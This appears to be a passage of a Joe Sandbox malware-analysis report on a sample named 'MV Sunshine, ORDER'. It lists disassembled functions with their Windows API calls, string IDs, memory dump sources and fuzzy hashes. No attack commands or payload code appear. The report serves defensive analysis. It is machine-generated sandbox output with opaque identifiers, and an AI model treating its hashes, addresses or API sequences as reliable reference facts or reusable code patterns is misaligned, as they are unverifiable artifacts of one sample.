                      • Instruction Fuzzy Hash: 3261AD39104710DFDB35EF54DE48B79B7F5FB82316F108828E44296AA0C776A882DF92
                      APIs
                        • Part of subcall function 009825DB: GetWindowLongW.USER32(?,000000EB), ref: 009825EC
                      • GetSysColor.USER32(0000000F), ref: 009821D3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ColorLongWindow
                      • String ID:
                      • API String ID: 259745315-0
                      • Opcode ID: 2c68e4304da3b2d5f60ab6cded54823d8499c1b1a6fc33469e406cbc4d28be4d
                      • Instruction ID: f9958a147278af925e821f5c51352d674c841157f20cf5dd98106490346f4cf0
                      • Opcode Fuzzy Hash: 2c68e4304da3b2d5f60ab6cded54823d8499c1b1a6fc33469e406cbc4d28be4d
                      • Instruction Fuzzy Hash: 1F416F31104144AEDB29AF68DC88BB93B69EB46331F144365FE759B2E6C7318C43DB61
                      APIs
                      • CharLowerBuffW.USER32(?,?,00A0F910), ref: 009EAB76
                      • GetDriveTypeW.KERNEL32(00000061,00A3A620,00000061), ref: 009EAC40
                      • _wcscpy.LIBCMT ref: 009EAC6A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: BuffCharDriveLowerType_wcscpy
                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                      • API String ID: 2820617543-1000479233
                      • Opcode ID: b04dfbdaa8ec5a0ee9a1e1f9f996bed5dda0b317eadaf7d54e50cf216029b1a0
                      • Instruction ID: d312ca66e37612acb6e23eb62d52248880486fdf415971e50e9d44d90490995c
                      • Opcode Fuzzy Hash: b04dfbdaa8ec5a0ee9a1e1f9f996bed5dda0b317eadaf7d54e50cf216029b1a0
                      • Instruction Fuzzy Hash: C05179311083419BC715EF15C882BAAB7A9FFD5704F184829F496972A2DB31ED4ACB93
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: __i64tow__itow__swprintf
                      • String ID: %.15g$0x%p$False$True
                      • API String ID: 421087845-2263619337
                      • Opcode ID: 7523e83d0e78816f07208de6a7ec52a4f8710171eccf48467e56886571c0ce77
                      • Instruction ID: 1c9a80398e77fab4957ae508ecf77ccb4ccb9300fa6fba5def532464d4ec390c
                      • Opcode Fuzzy Hash: 7523e83d0e78816f07208de6a7ec52a4f8710171eccf48467e56886571c0ce77
                      • Instruction Fuzzy Hash: BB411271604205AFDB24EF38DD42FBAB3E8EB85310F24486EF549D7281EA72D941CB51
                      APIs
                      • _memset.LIBCMT ref: 00A073D9
                      • CreateMenu.USER32 ref: 00A073F4
                      • SetMenu.USER32(?,00000000), ref: 00A07403
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A07490
                      • IsMenu.USER32(?), ref: 00A074A6
                      • CreatePopupMenu.USER32 ref: 00A074B0
                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A074DD
                      • DrawMenuBar.USER32 ref: 00A074E5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                      • String ID: 0$F
                      • API String ID: 176399719-3044882817
                      • Opcode ID: 9f595dde7d1e6e4f874bea6d17b7a458d401a302d4d93378ec6ea4bda1f82b46
                      • Instruction ID: 10c2279c20fac198dad5aaff374a01c865096037f110f72adeabf41cd79c5deb
                      • Opcode Fuzzy Hash: 9f595dde7d1e6e4f874bea6d17b7a458d401a302d4d93378ec6ea4bda1f82b46
                      • Instruction Fuzzy Hash: FE410979A01209EFDB20DFA4E884E9ABBF5FF49310F144029F955A73A0D732A921CF50
                      APIs
                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00A077CD
                      • CreateCompatibleDC.GDI32(00000000), ref: 00A077D4
                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00A077E7
                      • SelectObject.GDI32(00000000,00000000), ref: 00A077EF
                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00A077FA
                      • DeleteDC.GDI32(00000000), ref: 00A07803
                      • GetWindowLongW.USER32(?,000000EC), ref: 00A0780D
                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00A07821
                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00A0782D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                      • String ID: static
                      • API String ID: 2559357485-2160076837
                      • Opcode ID: 7833286d6cc9fc8252b7706fa3a5234a460e9112c0aae61bd9023e9518d4a742
                      • Instruction ID: 4b2679acfa139f05904589c54941e0b551b9fda8634f0a439169e5d8a78d764f
                      • Opcode Fuzzy Hash: 7833286d6cc9fc8252b7706fa3a5234a460e9112c0aae61bd9023e9518d4a742
                      • Instruction Fuzzy Hash: CE317031505119BFDF219FA4EC08FDA3B69FF09761F114224FA15A61E0D731E862DBA4
                      APIs
                      • _memset.LIBCMT ref: 009A707B
                        • Part of subcall function 009A8D68: __getptd_noexit.LIBCMT ref: 009A8D68
                      • __gmtime64_s.LIBCMT ref: 009A7114
                      • __gmtime64_s.LIBCMT ref: 009A714A
                      • __gmtime64_s.LIBCMT ref: 009A7167
                      • __allrem.LIBCMT ref: 009A71BD
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A71D9
                      • __allrem.LIBCMT ref: 009A71F0
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A720E
                      • __allrem.LIBCMT ref: 009A7225
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A7243
                      • __invoke_watson.LIBCMT ref: 009A72B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                      • String ID:
                      • API String ID: 384356119-0
                      • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                      • Instruction ID: 874df97b0810270554937eedef87e39e4f602fb50b5224b78aedfdd2d53f839f
                      • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                      • Instruction Fuzzy Hash: E671C871A04716ABE7149EB9CD43BAAF3A8EF52324F14823AF914E7681E770D94087D0
                      APIs
                      • _memset.LIBCMT ref: 009E2A31
                      • GetMenuItemInfoW.USER32(00A46890,000000FF,00000000,00000030), ref: 009E2A92
                      • SetMenuItemInfoW.USER32(00A46890,00000004,00000000,00000030), ref: 009E2AC8
                      • Sleep.KERNEL32(000001F4), ref: 009E2ADA
                      • GetMenuItemCount.USER32(?), ref: 009E2B1E
                      • GetMenuItemID.USER32(?,00000000), ref: 009E2B3A
                      • GetMenuItemID.USER32(?,-00000001), ref: 009E2B64
                      • GetMenuItemID.USER32(?,?), ref: 009E2BA9
                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009E2BEF
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009E2C03
                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009E2C24
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                      • String ID:
                      • API String ID: 4176008265-0
                      • Opcode ID: c86c3e18cb56c182eadc7bb0539c386bb934e63013842ccc47117b2b7444b37b
                      • Instruction ID: ab50b6680724cefd84371bf5765190ac2bf9384958604570d6482f0eb501834c
                      • Opcode Fuzzy Hash: c86c3e18cb56c182eadc7bb0539c386bb934e63013842ccc47117b2b7444b37b
                      • Instruction Fuzzy Hash: B96196B490028DAFDB22CF95CC84EBE7BBCFB46304F240599E841A7251D771AD46DB21
                      APIs
                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A07214
                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00A07217
                      • GetWindowLongW.USER32(?,000000F0), ref: 00A0723B
                      • _memset.LIBCMT ref: 00A0724C
                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A0725E
                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A072D6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessageSend$LongWindow_memset
                      • String ID:
                      • API String ID: 830647256-0
                      • Opcode ID: 766a1f262efd2814a4b68e8026bb56f750340a7439a632e4dd5095fd3fad129f
                      • Instruction ID: a134d5a4dd0f7fe94145d31018d9e462bca0f91b0a052696a703e398ebff3581
                      • Opcode Fuzzy Hash: 766a1f262efd2814a4b68e8026bb56f750340a7439a632e4dd5095fd3fad129f
                      • Instruction Fuzzy Hash: D5617B75900208AFDB20DFA4DC81EEE77F8EB49710F140159FA15AB2E1D771AD42DBA1
                      APIs
                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 009D7135
                      • SafeArrayAllocData.OLEAUT32(?), ref: 009D718E
                      • VariantInit.OLEAUT32(?), ref: 009D71A0
                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 009D71C0
                      • VariantCopy.OLEAUT32(?,?), ref: 009D7213
                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 009D7227
                      • VariantClear.OLEAUT32(?), ref: 009D723C
                      • SafeArrayDestroyData.OLEAUT32(?), ref: 009D7249
                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009D7252
                      • VariantClear.OLEAUT32(?), ref: 009D7264
                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009D726F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                      • String ID:
                      • API String ID: 2706829360-0
                      • Opcode ID: 832cd88d2d7b2b1a2f2e2a5500396d16e3783cc8fe3a73faccfc26e78f76ae1e
                      • Instruction ID: abaec7cd3b33e00806f3d48be23c6a942ba13d55d81e163458920014888bef1e
                      • Opcode Fuzzy Hash: 832cd88d2d7b2b1a2f2e2a5500396d16e3783cc8fe3a73faccfc26e78f76ae1e
                      • Instruction Fuzzy Hash: 7341513594421DAFCF10DFA4D884AAEBBB8FF48354F00C06AF955A7761DB31A946CB90
                      APIs
                      • WSAStartup.WSOCK32(00000101,?), ref: 009F5AA6
                      • inet_addr.WSOCK32(?,?,?), ref: 009F5AEB
                      • gethostbyname.WSOCK32(?), ref: 009F5AF7
                      • IcmpCreateFile.IPHLPAPI ref: 009F5B05
                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009F5B75
                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009F5B8B
                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009F5C00
                      • WSACleanup.WSOCK32 ref: 009F5C06
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                      • String ID: Ping
                      • API String ID: 1028309954-2246546115
                      • Opcode ID: 7caa06bc6f7fade9e8d1b4e3378068c92ae769b664e6673339e32f4748a18b5a
                      • Instruction ID: 3b4cdacc37e02512dd7701310385c4c527235a1893a22e6115d9c95170cb49cb
                      • Opcode Fuzzy Hash: 7caa06bc6f7fade9e8d1b4e3378068c92ae769b664e6673339e32f4748a18b5a
                      • Instruction Fuzzy Hash: 835181316047049FD720EF64DC49B3AB7E4EF84710F15892AF696EB2A1DB70E801CB42
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 009EB73B
                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 009EB7B1
                      • GetLastError.KERNEL32 ref: 009EB7BB
                      • SetErrorMode.KERNEL32(00000000,READY), ref: 009EB828
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Error$Mode$DiskFreeLastSpace
                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                      • API String ID: 4194297153-14809454
                      • Opcode ID: 885ac090ed4e9c9aeeb96e45b602cf13f531c1310c1cdb293266b24e22620aa8
                      • Instruction ID: 137586aa7f21a5254bd6a9ec80e22fcc6ea587b75463455e1ff0cb06636a2d7b
                      • Opcode Fuzzy Hash: 885ac090ed4e9c9aeeb96e45b602cf13f531c1310c1cdb293266b24e22620aa8
                      • Instruction Fuzzy Hash: FC317435A00249AFDB11EFA5C885ABFB7B8FF98700F144429F501D7691DB729D42CB51
                      APIs
                        • Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82
                        • Part of subcall function 009DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 009DB0E7
                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 009D94F6
                      • GetDlgCtrlID.USER32 ref: 009D9501
                      • GetParent.USER32 ref: 009D951D
                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 009D9520
                      • GetDlgCtrlID.USER32(?), ref: 009D9529
                      • GetParent.USER32(?), ref: 009D9545
                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 009D9548
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 1536045017-1403004172
                      • Opcode ID: bb6d40a0273da69ab581b7928e2db0182fb4ef89c238fde45db6ad7402699821
                      • Instruction ID: 0d7891049653c7e4ccadfc8b5ef51818df84c461aaa1b4c710acdc2a878adf1d
                      • Opcode Fuzzy Hash: bb6d40a0273da69ab581b7928e2db0182fb4ef89c238fde45db6ad7402699821
                      • Instruction Fuzzy Hash: 0021B274940108BFCF05EFA5CC85EFEBB68EF95310F104226B961973A2DB75991A9B20
                      APIs
                        • Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82
                        • Part of subcall function 009DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 009DB0E7
                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 009D95DF
                      • GetDlgCtrlID.USER32 ref: 009D95EA
                      • GetParent.USER32 ref: 009D9606
                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 009D9609
                      • GetDlgCtrlID.USER32(?), ref: 009D9612
                      • GetParent.USER32(?), ref: 009D962E
                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 009D9631
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 1536045017-1403004172
                      • Opcode ID: 59f03d4d7fb05c071933662d99528e0127171f76f48fa672c0c95ca95164005b
                      • Instruction ID: 07ef0c7d776c203deb1189cf52e378f8722dc0a67285f10c3a10dfd75cd70349
                      • Opcode Fuzzy Hash: 59f03d4d7fb05c071933662d99528e0127171f76f48fa672c0c95ca95164005b
                      • Instruction Fuzzy Hash: E321B374940208BFDF15EBA1CCC5EFEBBB8EF48300F504116B911A72A1DB75991A9B20
                      APIs
                      • GetParent.USER32 ref: 009D9651
                      • GetClassNameW.USER32(00000000,?,00000100), ref: 009D9666
                      • _wcscmp.LIBCMT ref: 009D9678
                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 009D96F3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ClassMessageNameParentSend_wcscmp
                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                      • API String ID: 1704125052-3381328864
                      • Opcode ID: c6ea0998a4359ce6d1601625f7a3e35fe53e85598bf2a47d0941ffebef6a157f
                      • Instruction ID: 0fe364a8c22e30d981ff990f5b4d1e80636afebf93f3572b03504617e9986e1e
                      • Opcode Fuzzy Hash: c6ea0998a4359ce6d1601625f7a3e35fe53e85598bf2a47d0941ffebef6a157f
                      • Instruction Fuzzy Hash: C811E97728C307BAFA113620DC07EA7779C9B06760F208527F900A55E1FEA2E9564B98
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 009F8BEC
                      • CoInitialize.OLE32(00000000), ref: 009F8C19
                      • CoUninitialize.OLE32 ref: 009F8C23
                      • GetRunningObjectTable.OLE32(00000000,?), ref: 009F8D23
                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 009F8E50
                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00A12C0C), ref: 009F8E84
                      • CoGetObject.OLE32(?,00000000,00A12C0C,?), ref: 009F8EA7
                      • SetErrorMode.KERNEL32(00000000), ref: 009F8EBA
                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 009F8F3A
                      • VariantClear.OLEAUT32(?), ref: 009F8F4A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                      • String ID:
                      • API String ID: 2395222682-0
                      • Opcode ID: c7d74d171e08ebabeabb0f10e58eb4e29afe0c473ca677183e182b8de315530b
                      • Instruction ID: 3c36780df534fcb871dca1ba3f04835fd7be42099fedabacf3b41bbcf9b6316a
                      • Opcode Fuzzy Hash: c7d74d171e08ebabeabb0f10e58eb4e29afe0c473ca677183e182b8de315530b
                      • Instruction Fuzzy Hash: 7AC13471208309AFD740EF64C884A6BB7E9FF89348F00492DF6899B251DB31ED06CB52
                      APIs
                      • __swprintf.LIBCMT ref: 009E419D
                      • __swprintf.LIBCMT ref: 009E41AA
                        • Part of subcall function 009A38D8: __woutput_l.LIBCMT ref: 009A3931
                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 009E41D4
                      • LoadResource.KERNEL32(?,00000000), ref: 009E41E0
                      • LockResource.KERNEL32(00000000), ref: 009E41ED
                      • FindResourceW.KERNEL32(?,?,00000003), ref: 009E420D
                      • LoadResource.KERNEL32(?,00000000), ref: 009E421F
                      • SizeofResource.KERNEL32(?,00000000), ref: 009E422E
                      • LockResource.KERNEL32(?), ref: 009E423A
                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 009E429B
